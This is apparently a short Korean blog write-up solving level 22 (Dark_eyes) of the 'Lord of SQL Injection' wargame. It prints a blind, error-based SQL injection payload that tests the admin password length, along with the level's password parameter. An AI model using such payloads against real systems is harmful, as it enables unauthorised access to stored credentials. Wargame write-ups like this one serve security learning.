반응형
[Level 22. Dark_eyes] Sol → ?pw=5a2f5d3c
이번 문제는 21단계 문제랑 똑같다. 다만 에러를 출력하되 에러의 이유는 출력하지 않는다.
저번 문제를 풀 때 이번 문제에서 추가로 필터링되는 case 같은 문자를 사용하지 않았기 때문에, 쿼리문은 그대로 사용하되 참/거짓 판별법만 살짝 바꿨다.
?pw=' or id = 'admin' and (select 0 union select length(pw) = 1)%23
반응형
'WarGames > SQL Injection' 카테고리의 다른 글
| Lord of SQL Injection : Evil_wizard[24] (0) | 2021.12.30 |
|---|---|
| Lord of SQL Injection : Hell_fire[23] (0) | 2021.12.28 |
| Lord of SQL Injection : Iron_golem[21] (0) | 2021.12.24 |
| Lord of SQL Injection : Dragon[20] (0) | 2021.12.22 |
| Lord of SQL Injection : Xavis[19] (0) | 2021.12.19 |
댓글